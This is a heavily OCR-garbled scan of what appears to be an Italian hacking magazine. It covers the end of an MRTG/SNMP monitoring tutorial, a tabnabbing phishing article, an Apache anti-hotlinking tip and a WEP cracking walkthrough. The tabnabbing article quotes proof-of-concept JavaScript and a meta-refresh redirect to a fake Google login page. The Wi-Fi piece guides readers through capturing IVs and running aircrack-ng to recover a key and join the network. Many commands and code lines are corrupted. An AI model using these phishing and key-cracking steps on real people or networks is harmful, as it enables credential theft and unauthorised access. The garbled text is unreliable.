pere i tempi di round trip su siti conosciuti da monitorare. 

/bin/cat -s > /efcc/mrtg/ping.cfg 
WorkTJir: /var/www/localho5t/mrtg 
Title[localho&t.ping] : Round Trip Time 
PageTop [localhost. ping] : <Hl>Roui-d Trip ri 
Tine</Hl> 

Target [locaUioBt.ping] : ' /etc/mrtg/ping.sh' 
HAxBytes t localhost. ping] : 2000 
Options [localhost. ping] : growright, -i 
urQ--iasiero,iiopercer.t, gauge 
Legendl [ localhost .ping] : Pkt lOBB % 
LegendO [localhost .ping] : Avg RTT 
J J egendl[ localhost. ping] : Max-Lmum Sound -> 
Trip ria» in «3 

Legend2 [localhost. ping] : Minìmisi Round i 
Trip Time in ms 

Legend3 [locaUiost.ping] : Maximal b i 
Minute Maxitnajn Round Trip Timo in ms 
Legenda [localhost. ping] : Maximal 5 i 
Hinute Minimum Round Trip Time in ms 
YLagend [ localhost. ping] : RTT (mi) 

Ancora [ctrt]+[d]. Cominciamo ora a generare gli script che 
andranno a richiamare mrtg: 

/bin/cat -s > /etc/cron.mrtg/tra 





#!/bin/sh 

/usr/bin/mrtg /etc/mrtg/traffic.cfg 
[ctrl]+[d] 

/bin/cat -a > /efcc/cron.mrtg/cpu.sh 
I;! /bin/sh 

/usr/bin/mrtg /etc/mrtg/cpu.cfg 
[Ctrl] + [ci] 

/bin/cat -s > Zete/ cren. m-rtg/-nnm. sh 
#!/bin/sh 

/usr/biii/mrtg /etc/-nrtg/mem.c£g 
[Ctrl] + Ed] 

/bin/cat -s > /etc/oron.mrtg/swap.sh 
#: /bili/ Eh 

/usr/bin/mrtg /ete/mrts/swap.ctg 
[ctrl] + [d] 

/bin/cat -s > /etc/cron.mrtg/ping.sli 
#! /bin/sh 

/usr/bin/mrtg /etc/mrtg/ping.cfg 
[ctrlj+ld] 

Prepariamo ora lo script che andrà a com piere il comando: 
/bin/cat -s > 

/etc/mrtg/ping.sh #l/bin/sh PIHG»"/bin/ 't 
ping" # Google, £or example 
lU)BRi="googlo.cciii" UATa="$PlBG -clO -sSOO -> 
$ADDR -q ' LOSS- 'acho $DATA | 
awk Mprint S18 }' | tr -d V echo $LQSS 
il [ $l,OSS ■ 100 Ij then anno 0 
elee echo SUATA I awk -P/ > {print $5 }' 



Rendiamo quindi eseguibili gli script con: 

bin/chmod *x Zete /cren. mrtg/*.sn 
/chmod +x /etc/mrtg/ping.sh 







A queste punto avviamo per tre volte ogni script, così da 
poter generare le prime statìstiche. Non badate agli errori 
dato che inizialmente non avrà le vecchte (statistiche): 

/hin/sh /atc/cron.mrtg/traffic.zh 
/bin/ah /etc/croa.rartg/cpu.sh 
/iin/sh /iStc/cron.mrtg/inMii. sii 
/hin/&!h /etc/cron.mrfccf/swaPtSh 
/blu/ ah. Zete / cron . mrtg/pìng . sh 

Finalmente abbiamo le nostre statistiche! Non ci resta in- 
fine che generare un index.html che permetta di ordinare 
tutti i nostri grafici: 

/usr/bin/indeioiahar — output=/var/wwi)// ■> 

localhoBt/mrtg/indeK.Iitinl \ 

— titla= "Power Under Control ■■)" \ 

— sort=naaie \ 

— enumerat* \ 

/etc/mrtg/traffic.efg \ 

/etc/mrtg/cpu.efg V 

/etc/rarfcgr/raem.cfg \ 

/etc/mrtg/swap.cfg \ 

Zete /mr tg /ping . c Ég 

Perfetto! Non ci resta che aggiungere in cron j[ nostro lavo- 
ro: 

crontsb -è 

/bin/cat /var/spool/cron/cronfcahs/root 
*/S * * * « /bin/rua-parts /ato/erem, -> 
nirtg 1? /dar/nuli 

Bene. Abbiamo concluso!! Puntiamo il nostro browser 
preferito su: Afar/wivw/locajhost/iarmw/itide)Lrrtrril fn caso 
qualcuno di voi volesse usare mini htt pel o apache, sarjf è 
necessario far puntare la DocumentRoot a tate subdirecto- 
ry, avviare il servizio e collegarsi su: httpV/loCalhosVmrtg 
Ecco qui Je nostre statistiche! Per approfondire meglio lo 
studio dell'snmp, il tool 'net-snmp* mette a disposinone 
svariati tool informativi e di diagnosi, iniziamo con snmp- 
walk: Snmpwalk is an SNMP application that uses SNMP 
GETNEXT requests to query a network entity 
for a tree of information Quindi, snmpwalk, sfrutta la richie- 
sta 'GETNEXT per ottenere informazioni sull'alberatura 
snmp dell'oggetto richiesto. In questo modo possiamo 
utilizzarlo come banale "visualizzatore" di stato, Il risultato 
ottenuto sarà quindi il valore dell'OID (Object Identifier) 
richiesto. Cominciamo quindi con la richiesta dell'oggetto' 
*mgmt.1 .2.2.1 .10.2" 

$ snmpwalk -v 1 -c public localhost -i 
mgmt. 1.2. 2.1.10. 2 

IF-MIB: :if XfiOCtets.2 = Cotinter32; MQ021440 

Ecco che quindi, snmpwalk, ci ha restituito il valore dell'og- 
getto desiderato. Per conoscere a cosa corrisponde un 
determinato oggetto, possiamo usare un'altra Utility messa 



a disposizione dalla suite net-snmp -snmptngnslate', Come 
è facile intuire, questo programma 
trasforma l'oggetto (DID) in una descrizione sul suo conte- 
nuto, facilitando cosi la lettura e la comprensione. 

5 smuptranslate- -IR -T<5 iagrat .1.2. 2.1. 10. 2 
IF-MlBi sii IrtCctets.2 
LÉlnOctetS OBJECT-XYPE 



— FSDM IF-M1B, RFC 12 13 -MB 

SYHTSJC COunter32 

MAX- ACCESS read-only 

STATUS current 

DESGRIPTION "The total number of octets received on 
the interface, includirtg framing characters. 

□iscontinuities in the value of this counter can occur at re- 

initiaiìzation of the management system, 

and at other times as indicated by the vaiue of ifCounterDi- 

scontinuityTime.™ 

::- { iso(l) org(3) dod(6> internata) A 
Bigjnt(2) min-2(l> 

interfanss(2) ifTable<3) ifEntry(l) -i 
iflnOctetsUO) 2 ) 

Ora, per esempio, potreste divertirvi a conoscere gli OID di 
un vostro hosi semplicemente con: 

$ snmpwalk -v 1 -c public localhost 

Quindi, adesso, ponete generare i vostri file di configura- 
zione (oppure come ho fatto io per il ping, con uno script} a 
seconda delle informazioni di cui avete bisogno. Una lettu- 
ra ai manuali di: 

rrtrtg 
snmpd 
snmpwalk 
snmptranslate 

sarà sicuramente più esplicativa. Beh, non mi resta ohe au- 
gurarvi un buon *MRTG* a tutti! khazad-dum. 
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Minaccia Web 2.D 

IL TABNABBING 



Nell'era del Web £.□, UN at- 
tacco INFORMATICO NON RICHIE- 
de necessariamente di essere 
tecnico per fare delle vittime 
o violare la privacy altrui. 
Per il cicld "la sicurézza web 
non è solo sql injection o 
Cross Site scripting", que- 
sto ARTICOLO MIRA A FARVI APRI- 
RE GLI OCCHI SU ALCUNE REALTÀ 
EMERGENTI, LASCIANDO PER UNA 
VOLTA DA PARTE I SOLITI MEC- 
CANISMI DI SPAM E PHISHING 



Una delle prime attiviti ella quale mi sono dedicato entra ndo 
in Internet come tanti che hanno avuto l'approccio iniziale 
con la grande rete negli anni 96/97, è stato cominciare a 
8 ma netta re con Netscape Navigator ed internet Ex- 
plorer 3-0 [i principali browser disponibili in quel partico- 
lare periodo storico) nel tentativo di ireare pagine HTML 
interattive, come le chiamavamo a quei tempi. Riuscire a 
posizionare un'immagine al centro della finestra del browser 
o ancorare un collegamento ad una risorsa esterna, appa- 
riva di per sé un miracolo e celava un non so che di mi- 
stico. Eppure le pagine erano esclusivamente statiche e si 
era ben lontani dalla possibilità di generare contenuti dina- 
mici. No, le CGI in basti o in C non erano cento conside- 
rate sinonimo di flessibilità, Ancora in pochi intravedevano 
nel web un possìbile vettore d'attacco e bug come quello 
sul phf [1] non facevano certo presagire una rivoluzione nel 
panorama dell'IT Security governato, almeno fino a -quel mo- 
mento, dalla sovversione e dallo sfruttamento di servizi di 
rete vulnerabili e/o mal configurati. Il Web 2,0 cambia però 
radicalmente questo scenario, portando con se dinamicità, 
flessibilità ma anche una quantità di attacchi completamente 
nuovi, attacchi non necessariamente tecnici, come un buffer 
overflow, ma che fanno comunque leva sull'astuzia e non per 
questo sono da considerarsi meno pericolosi. Oggi paricrc- 




A2a Raskin. 
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classe 1984. 
h vero wfto 
ci IsiXMbing 



mo proprio di una (ti queste insidie emergenti. Dopo aver 
letto l'articolo, imparerete probabilmente a vedere la navi- 
gazione in internet con un occhio completamente diverso! 

Cosa era il phf? 

Il phf era una egi di esempio che implementava un servizio 
di rubrica telefonica. Lo script veniva incluso di default in 
alcuni web server (principalmente NCSA httpd 1.5 ed 
Apache 1.0.3) durante gli anni 90 e soffriva di una vulne- 
rabilità che consentiva l'esecuzione di codice remoto sul si- 
stema ospite. Qu elio del phf è stato u no dei bug più sem p liei 
da sfruttare nella storia delie web application, forse quello 
che più di tutti ha ispirato una nuova generazione di hacker, 
invogliandola a sperimentare e divulgare le tecniche di at- 
tacco web emerse negli anni successivi e che sono state 
le progenitrici della moderna Web Application Security. 



Tatui ab birg: il lato pratico 

L'astuzia dicevamo, Uno degli attacchi forse più ingegnosi 
mai partoriti dalla mente umana nell'era del Web 2.0 è il 
tabnabbing. Si tratta di una sorta di phishing avanzalo in 
cui sostanzialmente l'utente naviga in un arto che sembra 
solo in apparenza nonmale. Quando il codice Javascript 
del silo rileva la perdita di focus e quindi che sul tab in 
cui è stato visualizzato non vi è più interazione perchè l'u- 
tente ha spostata la sua attenzione verso un'altra tabella 
del browser (o un'altra parte del desktop), il sito modifica 
in tempo reale il suo aspetto. Ad esempio l'icona, il testo 
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ed i contenuti iniziali potrebbero essere sostituiti al volo 
m modo da apparire in tutto e per tutto uguali alla pagina 
di autenticazione di Gmail, L'utente che ritorna sul lab (e 
che magari tiene con tempo reneamenle aperte altre tabelle 
del browser o sta navigando su finestre multiple) a questo 
punto potrebbe non ricordarsi del sito originale e potrebbe 
essere indotto a pensare che la sua sessione dì gmail sia 
scaduta e quindi procedere nuovamente al log in. In questo 
modo le sue credenziali di autenticazione vengono inter- 
cettate dall'aggressore (di fatto l'interazione sfa avvenendo 
su una risorsa web dell'attacker) ed utilizzate per direnate 
e ioggare l'utente verso il vero- sito di Gmail, cosi do non 
destare sospetti. 

Questo trucco sfruita sostanzialmente la debolezza della 
mente umana nel gestire efficientemente e razionalmen- 
te più tab. Quando si trova a dover lavorare sotto queste 
condizioni, la memoria fa brulli scherzi e l'utente tende a 
confondersi o dimenticare le operazioni compiute appena 
un attimo prima, Vi sembra una stupidaggine? Volete un 
esempio che vi faccia vedere più da vicino cosa accade 
durante una sessione di tabnabbing? 
Benissimo. Prima di capire cóme tecnicamente questo 
trucco può essere implementato, osserviamo un esempio 
pratico che potrete seguire nei vari step aiutandovi anche 



con le Figura I r 2s3. 

Aprile diversi tab nel vostro browser e navigate su vari siti 
a vostra scelta. Dopo, da un altra tab, accedete a questo 
URL: ftttp:/ftmw.azamsk.Mblog/posb l Q-nQw-type-Qf-phi- 
stimg-attack/ (Figura 1). 

Allontanatevi adesso dal browser (ad esempio aprite il 
client di posta elettronica preferito oppure navigate su uno 
dei siti aperti in precedenza) e svolgete questa operazione 
per almeno cinque secondi (Figurai 2). Successivamente 
provate ad identificare il tab in cui era stalo aperto il sito 
http-J/www.azanisk.ift e visualizzatelo (Figura 3). Notale 
nulla di strano? I contenuti del sito originario sono cambiati 
od ora, al loro posto, trovato la raffigurazione della login di 
Gmail. 

In realtà, essendo questa una dimostrazione dello poten- 
zialità del tabnabbing. ciò che avrete davanti sarà solo 
un'immagine del sito in questione ma, in uno scenario 
reale, potete scommettere che tutto avrà un aspetto più 
veritiero. Provate adesso ad immaginare che la scherma- 
ta di login sia reale. Sapendo di essere olenti Gmail, pro- 
vereste >Jd auisnlittirv? Beh so In r sposta è alfe":ial : va. 
avreste fornito nelle mani di uno sconosciuto usemarne e 
password del vostro account. 
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Tabnabbirtg: il Iato tecnico 

Non è necessario alcun requisito particolare per mettere 
in atto questo trucco (a parte le oVvie personalizzazioni}. 
Tutto ciò che occorre è posi?ionare un lag <script> nella 
pagina principale di un sito che faccia riferimento a bgat- 
tack.js Il sorgente Javascript lo trovato qui [2] 

Lo sapevi che è statai una donna a scoprire 
per prima lo storico bug sul phf? 

Anche se if bug era già noto da tempo nei circoli hacking 
e nell'underground digitale di quel periodo, la divulgazio- 
ne pubblica della falla avvenne solo nel fharzo del 1996 
grazie ad un advisory emesso dall'interne! Emergency 
ftesponse Team di IBM. La segnaiazione del bug al team 
era però arrivata origina riamente da Jennifer Myers. 
La Myers si accorse che la procedura escape shell 
cmrJ ! ) utilizzata dallo script per rimuovere caratteri 
potenzialmente pericolosi, prima di passare l'input utente 
a librerie che interagivano con la shel! di sistema come 
popen ! I o syut on ■! ; . non validava corretta ménte la 
presenza del carattere di ritomo a capo («ex: UxOa 
LrfilizzanrJo ad esempio if seguente URL, erg possibile 
lanciare comandi arbitrari in presenza, delia egi vulnera- 
bile: 

passwd 

Nel caso specifico era possibile ottenere il file /etc/pas- 
swd dai sistema ospite. Se il web server girava come 
utente roet (abbastanza frequente in quegli anni) falta- 
cker poteva eseguire comandi con i massimi privilegi 



Dando u n 'occh iata ravvicinala a questo cod ice (con sig liamo 
a tal proposito di stampare il listato ohe comunque non ha di- 
mensioni eccessive) si comprende benissimo come l'attac- 
co pub essere implementato e perfezionato. Anzitutto, nella 
funzione principale (inizio listato) si può notare che il codice 
registra due eventi nella finestra corrente (oggetto window): 

vindow.ùriblui: = f unctioiit} { 

TIMER = getTimeout (changeltUp, 5000): 



«rindow , onf ocus ■ function () { 
if (TIMER) e 1 ^Timeout {TIMER! ,- 

1 



L'evento onblui: entra in gioco quando la finestra del 
browser su cui il codice Javascript sta girando perde il focus. 
Se la perdita di focu s è superiore a 5 secondi , vien e i n vocata 
la funzione thangeitUp che si occupa di cambiare al volo 
i connotati del sito attuale, In caso contrario (evento pofo- 
cvs), ovvero se la finestra riottiene il focus, il timer viene re- 
settato in attesa che l'utente si allontani nuovamente dal tab. 
Osservate adesso più da vicino la funzione ciiatigeitup: 



£unct i on change I e Up ( } { 

if! HA£_5WITCH£D == faine ){ 

c reateShield ("tot tps : / / mai 1 . googl e . 

ooim" ) ; 

setTitlef "Gmail: Email from Google" ) : 
f avican . set ( "ht tps : / /mai 1 . googl e . corti/ 
f avieon. ico° ) ; 

has_3witched ^ trae; 

} 

} 

Se il passaggio dai sito originario a quello che rattacker 
intende impersonane non è già avvenuto (cioè has 
SWITChed == false) il codice dentro questa funziono 
svolge fondamentalmente tre operazioni: 

ereateShieltìO si occupa di cambiare i contenuti del 
sito. Tutto ciò che il codice di esempio fa, in questo caso, e 
di aggiungere un nuovo elemento <div? davanti ai conte- 
nuti osistenti in modo da oscurarli attraverso l'inserimento 
di un tag ...i che punti ad un'immagine raffigurante il 
sito Gmail. Ovviamente in uno scenario di attacco reale, 
occorrerà ben più che inserire una semplice immagino che 
fariigiin la pagina principale di Gmail. Trattandosi tuttavia 
di una dimostrazione vi dovrete accontentare. Sta a voi ti- 
rare fuori dallo skeleton di bgattack.js qualcosa di più 
di quanto già fa, se siete interessati. Tornando al sorgente 
Javascript, «triti* 0 è invece la funzione preposta a 
cambiare il titolo della pagina. Ciò avviene semplicemente 
alterando la proprietà tìbie dell'oggetto documenti 

function seeTitle(text) { document , Litle - 
text ; } 

1 1 metodo setdella classe user-defined t av 1 con viene i nfi ne 
utilizzalo persostituire l'icona attuale del sito con queJlaorigi- 
naledi gmail, in morfoda dare una parvenza più reale al tutto. 

Conclusione 

Ad aver parlato pubblicamente per la prima volta di tabnab- 
bing, avendone dimostrato tra I : altro l'efficacia cori il Proof 
Of Concepì bgattack.js, è stalo Aza Raskìn Lo stesso 
Raskin, tuttavia, ammette che l'attacco presenta delle li- 
mitazioni umane e tecnologiche che vate la pena 
menzionare a beneficio dei nostri lettori. Ovviamente la 
sua efficacia (e probabile riuscita) è direttamente propor- 
zionale al numero di lab con cui la vittima sia interagendo 
nel momento in cui viene attaccata (più ce ne sono aperti, 
maggiori sono le possibilità che la sua mente possa con- 
fondersi in fase di switch), Per quanto riguarda il vincolo 
tecnologico invece, per poter funzionare correttamente, 
l'attacco necessita che Javascript sia attivo sul browser di 
chi visita il sito. Come osservato da qualcuno, nell'eventua- 
lità in cui il supporto Javascript sia per qualche motivo stato 
disattivato (molto improbabile, ma possibile) un attacco si- 
mile, sebbene non con lo stesso livello di controllo offerto 
dalla registrazione degli eventi cnblur ed onfocus, può 
essere implementato in modo più grezzo utilizzando un 



HTML meta refresh tag come di seguito mostrato; 
iliead? 

<meta http-equi','>-"i:ef resti" 

content="l5 ;url=hccp : / /sito/pagina/finta/goo- 

gle, html"a 

</head» 

<body> 

Il contenuto momentaneo del sito va qui, Il 
redirect ac-atterà tra 15 secondi ma senza 
controllo sulla perdita a 1' aequi sii ione di 
focus del tab 
< ,/body> 
</hcml> 

E' opportuno considerare, comunque, che le versioni più re- 



ttili tei principiali browser, per impostazione di sicurezza 
predefìnita, ignorano la presenza dei tag meta refresh. 
Questo mecca nismo di redi rect in passato è i nfatti stato a bu- 
cato dagli spammer e da chi promuoveva siti di phishing, 
tanto die i motori di ricerca in alcuni casi si rifiutato oggi 
di indicizzare pagine HTML che contengono questo tag. 
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Casa si intende per Web 2.0 

Il termine web 2.0 viene spesso utilizzato impropriamente, associandolo alia presenza cS uno standard particola- 
re oppure a specifiche, tecniche oen precise. In realtà Web 2.6 è solamente un concetto, un modo di pensate all'im- 
postazione de! World Wide Web, il termina è stato per Sa prima coniato da O'Reilly e MediaLive Internationa! du- 
rante, una conferenza svoltasi nel 2004 per poi. da li a poco, venire estensivamente impiegato dall'intero mondo IT. 
In uri primordiale tentativo di distìnguere chiaramente ciò che poteva essere definito conforme al termine Web 2.0 da ciò che 
nonio era, O'Reilly e tècdialive Wamational stilarono una breve lista di applicazioni distinguibili sotto le categorie Web 1.0 
e Web 2.0. Il tentativo non andò nivalmente a buon fine, anzi per certi versi contribuì ad alimentane ulteriore confusione. 
Applicazioni come Napster o lo stesso BitTorrent vennero infatti inseriti nella categoria Web 2,0 pur non essendo a 
tutti gli affetti applicativi web. In realtà il concetto di applicacene conforme (compilanti al Web 2,0 non ha dei confini sta- 
tici, Non esistè cioè una soglia rigida, piuttosto vi è un insieme di principi e pratiche che in base a come miscelai:' determi- 
nano in modo pitto meno marcato l'appartenenza di un'applicazione alla sfera del Web 2.0. Ma quali sono questi principi? 

1) $i offrono servizi e non software pocefwffeato tale principio si basa sul fatto che i modelli di sviluppo applicativo tra- 
dizionali [software a pacchetto) sono considerati superati e bisogna entrare in un'ottica orientata ai servizi, 

2) li son'izio si migliora automaticamente se più persone lo utilizzarlo', se da un lato molte aziende devono aggiungere 
altri server ala :oro infrastruttura IT per migliorane i servizi offerti, un modello come q li o I io di BitTorrent rende ogni utente 
attore attivo nel determinare il miglioramento del servizio stesso. 

3) 1 servizi devono essere rintiliZi&Mi: Ogni servizio deve essere progettato in piccole componenti interscairtbiabifi. as- 
semblabili a piacimento e personalizzabili. 

4) Gl: utenti vanno considerasi co-svikippatori a tutti gli effetti: La partecipazione diretta negìi utenti che usufruiscono del 
servizio (ad esempio nel nicdelio Wikipedia dove sono gii utenti ad aggiungere, modificare e vigilare su!la qualità dei 
contenuti) conferisce ad essi lo status toncrà-cairsa di co-sviluppatori. 

5} I servizi non devono avere vincoli di piattaforma: i servizi devono essere fruibili a svariato tipologie d'utenza e piatta- 
forme (PC. smartphone, palmari, riproduttori digitali audio/video, etc). 

6} Non esistono rilasci beasi continui aggiornamenti ai servizi: al contrario cti una soluzione software a pacchetto o di un 
sistema operativo in Cui gli aggiornamenti 0 ìe nuove versiùn; vengono rilasciati su base periodica secondo Cicli Specifici 
(ad esempio in inedia tulio le distribuzione Linux più famose hanno una deadline di 6 mesi), un'applicazione Web 2.0 
va mantenuta ed aggiornata giornalmente con l'aggiunta graduate di nuove funzionalità in produzione. L'idea di fondo di 
un'applicazione conforme al termine Web 2,0 è infatti quella di immaginaria in uno stato di beta testina perpetuo, in cui le 
modifiche o i miglioramenti effettuati vengono introdotti gradualmente in produzione, vagliando asporti quali grado di utilità" 
ed effettivo utilizzo da parte degri utenti. Scio fe funzionalità di successo vengono mantenute attive, eliminando le altre. 
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APACHE - AN7KEECH 




BECURITY 

QWERD nriMF 
PROTEGGERE I FU r 
A DiSPriRiyinMF 
DEGLI UTENTI (E r>FI 
MAUNTENZinMflTll 
SU UN 5FRVFB 
PUBBLICD. 




a protezione dei nostri 
file su server pubblici 
è davvero importante 
e necessaria non 
tanto in primo luogo 
lper la protezione e la 
non duplicazione dei contenuti 
da parte di terzi, ma sopratutto 
per chi effettua link a nostri file 
presenti generando traffico e banda 
sul nostro sito. Una soluzione 
rapida ed efficace è da ricercare 
nel modulo mod.rewrite che 
permette di riscrivere le condizioni 
al volo (onTheFly). Lo script da 
implementare è molto semplice, 
| Consiste nel verificare il referer della 
richiesta HTTP e di confrontalo 
con quelli inseriti nella condizione, 
successivamente si può impostare 
la tipologia di file a cui, questa 
condizione, deve essere applicata. 
Mettiamo il caso che un' immagine si 
trovi htt p -J/viVìvì jj ost ros ito. it/img. g if 
imposteremo i referer in questa 
maniera: 



RewriteCond 9&{HT7P_REF£RER} 
! A http://nost rosi to.it [NC] 

RewriteCond S£{HTTP_REFERER: 
! *http://mw. nostrosito. it [NC] 

ReivriteRute gpf.(fitflGIFD$ - [F] 

In questo modo, nel caso in cui 
la richiesta non provenga da una 
pagina del nostro sito (http:// 
nostrosito.it/pagina.htm) Apache 
visuaiiZierà l'errore 403, 
Ecco una variante per proteggere 
tutti files. 

RewriteEnginc On 

I 

fiewpiteCond Si{HTTP„REFERER} 
!^http://geek-b'log.it [NC] 

RmriteCond K{HTTP_R£FERER} 
! A http://www.geek-blog.it [NC] 

RwiteRule *Vjfc.*Ì - [F] 

I files vanno creati con un editor di 
testo e salvati come ".hteccess" 




ERRDRI POSSIBILI 



Se lo script non funziona e non 
ci permette mai di scaricare il file 
verifichiamo il fog degli errori di 
apache. 

Un possibile errore: 

[lied Oct ZS 17:01:19 2010] 
[alert] [client 127. 0. 9.1] D:/ 
W.htaccess: Invitici cconcr.d 
'Rev.ritcEngine', pefhóps 
rtisspeUsd or dafinod b.y o ncdul* 
not ineluded in the server 
configurati on, referer: http://wvm. 
nostrosito. it/test.htm 

In questo caso verifichiamo che in 
httpd.oonf non sia commentata la riga; 



LondModule rpwLtejnodule modules/ 
rnod_rewritc. so 

[# commento) 

il fi 
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TESTARE LA PROPRIA RETE 'WIRELI 



LL 

Quaièil grado di 
sicurezza di una 
rete Wi-Fi? Secondo 
i più esperti in 
materia basta circa 



Quaièil grado di 
sicurezza di una 
rete Wi-Fi? Secondo 
i più esperti in 
materia basta circa 
un minuto per scovare la chiave 
di accesso di una rete wireless 
protetta dal noto metodo WEP. 
Poiché non sono poi cosi tante 
le modalità di protezione di una 
rete internet (Wireless) è più facile 
per gli "scrocconi" accedervi o 
perlomeno portare degli attacchi 
mirati.. 

Per chi non ne fosse a 
conoscenza i metodi di 
protezione di una rete Wi- 
Fì sono soltanto due: WEP e 
WPA. La modalità di protezione 
che at momento dà maggiore 
sicurezza è la WPA anche se 
quella larga mante più utilizzata è, 
invece, la WEP. 



WEP E WPA 

Prima di illustrare i programmi 
usati maggiormente 
approfondiamo i! significato di 
queste due sigle WEP e WPA: 
« WEP: corrisponde a Wired 
Equivalent Privacy, fa parte 
dello standard IEEE 802.11, 
specifico per rendere "sicuro" 
l'Utilizzo delle reti Wi-Fi. Poiché 
questa chiave di protezione 
con il tempo si è rivelata ormai 
scarsa in termini di protezione è 
stata progettata la chiave WPA 
presente dal 2003. Questa usa 
l'algoritmo di cifratura stream 
RC4 per la Sicurezza e CRC-32 
per l'integrità dei dati. 



Air Gradai 

E UNO DEI s : 
PIÙ DIFFUSI 
TOOL PER 
"ASCOLTARE" 
E MONITORARE 
IL TRAFFICO 

su una rete 
Wireless, ma 

PUD E55ERE 







• WPA: che corrisponde a Wi-Fi 
Protected Access è il protocollo 
realizzato per colmare le falle de! 
precedente, più sicuro ma con 
ancora diversi difetti. Il protocollo 
TKIP cambia dinamicamente la 
chiave in uso e la combina con 
un vettore di inizializzazione (IVS) 
di dimensione doppia rispetto 

al WEP (in modo da rendere 
vani gli attacchi simili a quelli 
previsti per il WEP) e può essere 
implementato nelle schede di 
interfaccia wireless pre-WPA, 
che cominciarono ad essere 
distribuite nel 1989, attraverso un 
aggiornamento del firmware. 

• WPA2: ancora poco usata, è 
la nuova chiave che dovrebbe 
sostituire la "vecchia" WPA. 

Per "rubare" una chiave WEP non 



i c'è bisogno di essere un esperto 
informatico, bastano alcuni 
strumenti e qualche programmino 
| in grado di intercettare i pacchetti 
| , che vengono trasmessi e 
I | decriptarli, naturalmente più 
pacchetti vengono captati più 
sono le possibilità di arrivare 
all'obiettivo. 



AIRCRACK 

Tra i programmi più usati abbiamo 
AirCrack scaricabile da questo 
indirizzo: 

http://downloads.phpnuke.org/it/ 
d ownload- item -view-a- b-m-g-x. 
htm 

Aircrack-ng è un pacchetto che 
permette di recuperare password 
dalle reti 602.11 WEP, WPA e 
WPA2-PSK. Il programma funziona 
in modo semplice, acquisisce 
i pacchetti che circolano sulla 
rete controliata ed esegue le fasi 
tradizionali di recupero: brute 
force, dictionary ecc. 
Inoltre, include gli strumenti 
necessari per ripristinare 
velocemente l'accesso a una rete 
senza fili. 



I "FERRI DEL 
MESTIERE" 

Eseguiremo l'applicazione dal 
prompt di DOS: per poter eseguire 
Il programma anche se non siamo 
nella directory che lo contiene, 
cliccate col tasto destro del 
mouse Su "Risorse del computer, 
Proprietà, Avanzate, Variabili 
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d'ambiente, Modifica" portatevi 
alla fine della linea su cui sono già 
scritte altre variabili d'ambiente, 
inserite un punto e virgola (";") e 
scrivete il percorso in cui si trova 
il programma. 

Avrete anche bisogno di installare 
dei nuovi driver per il vostro 
adattatore di rete: i driver originali 
non sono stati pensati per fare 
cose simili (per trovare dei driver 
che possano fare al caso vostro 
visitate il sito WildPacket online 
su www.wildpackets.oom). 
Per installare i nuovi driver, 
"clic destro su Risorse del 
Computer, Proprietà, Gestione 
Periferiche, clic destro sul vostro 
adattatore di rete. Proprietà, 
Driver, Aggiorna Driver, Installa da 
un elenco o percorso specifico", 
Scegliete il percorso in cui avete 
scaricato i driver. Assicuratevi, 
infine, che il vostro adattatore di 
rete sia ora compatibile col tutto 



Il primo passo è ovviamente 
quello di trovare una rete 



wireless. 
Digitate "Airodump" nel prompt 
de! DOS (Start, esegui, cmd). 
Vi comparirà una finestra 
contenente le schede di rete 
trovate sulta vostra macchina. 
Notate che accanto al nome 
delle schede di rete è presente 
un numero identificativo. Ad 
esempio: 

14 NETGEAR WG511T 54 Mbps 
Wireless PC Card 
22 NETGEAR WAG511 802.11 si 
b/g Dual Barid Wireless PC Card 

in questo caso digitate 22, 
il numero identificativo della 
scheda che ci interesse utilizzare, 
Ora vi viene chiesto di Indicare 
il chipset utilizzato dal vostro 
adattatore di rete. Ad esempio: 

Interface types: -o' = Hermesl/ 
Realtek 

'a' - Aironet/Atheras 
Quindi vi sarà richiesto di 



inserire il numero del canale da- 
controllare (sniffi ng). Per l'Europa 
il 14. Se volete fare una scansione 
di tutti I canali utilizzate lo zero. 

In seguito il programma chiederà 
di digitare il nome da dare al file 
che verrà creato a partire dalla 
scansione del canale. Digitata il 
nome che vi pare, ad esempio 
"WEP01". 

A questo punto Airerack vi 
chiederà se salvare gli interi 
pacchetti catturati e soltanto gli 
IV. Per craccare una chiave WEP 
vi basta salvare semplicemente 
gli IV (il che vi farà risparmiare 
diverso spazio sull'hard disk, 
quindi digitate "y"). 

Adesso vedrete una schermata 
simile: 



L 





BSS1D = l'indirizzo MAC 
dei l'Access Point. 

PWR - indica la forza del segnale 
che si sta ricevendo. 

BEACON5 - sono pacchetti 
"in chiaro™ che l'Access Point 
trasmette sostanzialmente per 
dire "sono un access point, 
collegati a me". 

DATA = è quello che ci interessa: 
sono gli IV che Aircrack utilizzerà 
per trovare la password WEP. 

ENC ■ il tipo di incapsulamento: 
WEP.WPA, OPEN... 

ESSID - Il nome delia rete 
Wireless. L'SSID è una sorta di 
identificativo della rete. Se ad 
esempio l'Access Point ha come 
SSID il nome "pippo" allora le 
schede wireless che si vogliono 
connettere devono impostare a 
loro volta come SSID "pippo". 
Nella seconda parte 
dell'immagine, sopra, vediamo 
i vari client che stanno 
^dialogando" con l'Access 
Paint", più esattamente vedi; 
i vari indirizzi MAC dei client. 



filtro dell'Access Point 
Aie rack continuerà a collezionare 
IV finché non lo fermate. Ru 
IV scaricate e più possibilità 
avete di decifrare la chiave. 
Aircrack dovrebbe trovare la 
chiave in pochi secondi. Per una 
chiare da 1 04 bit collezionate 
circa 2.000.000 di IV: a volte ne 
bastano molti meno, 
altre volte purtroppo 
dovrete scaricarne di 
più. 

Quando sarete 
soddisfatti del 
numero di IV 
collezionati premete 
"CTRL + C" per 
fermare i! programma. 

Scrivendo "Aìrcrack- 
ng" ne! prompt vi 
verrà mostrata la 
lista dei parametri 
che è possibile 
utilizzare. Per 
esempio, se 
abbiamo scaricato 
intorno ai 400.000 IV, 
in genere sufficienti 



bit, allora digitiamo il comando 
"aircrack-ng -n 64 WEPI.ivs". Con 
il parametro "-n 64" diciamo al 
, programma che la chiave ha una 
I lunghezza massima di 64 bit e di 
1 non provare qu i ndi oltre, 
Se riusciremo nell'intento, il 
programma ci restituirà un 



messaggio di "KEY FOUND" 
|'j seguito dai nome della chiave, 
i : Ora che avete la chiave utilizzatela 
proprio come se doveste 
connettervi ad una vostra 
rete "domestica". Se l'SSID 
dell'Access Point è abilitato 
seguite guasto passo. 



Premete su Start, Connetti 
a, Connessioni di rete 
senza fili, Visuaiizza reti 
senza fili disponibili. Se 
l'SSID è abilitato, questo vi 
Ì| appare nella finestra delle 

connessioni disponibili. 
' Fate doppio clic sull'icona 
della connessione ed 
inserite la password 
che avete trovato in 
precedenza: missione 
compiuta. 

A 




i vari indirizzi MAC dei eli 
Quest'informazione può 
risultare utile in seguito 
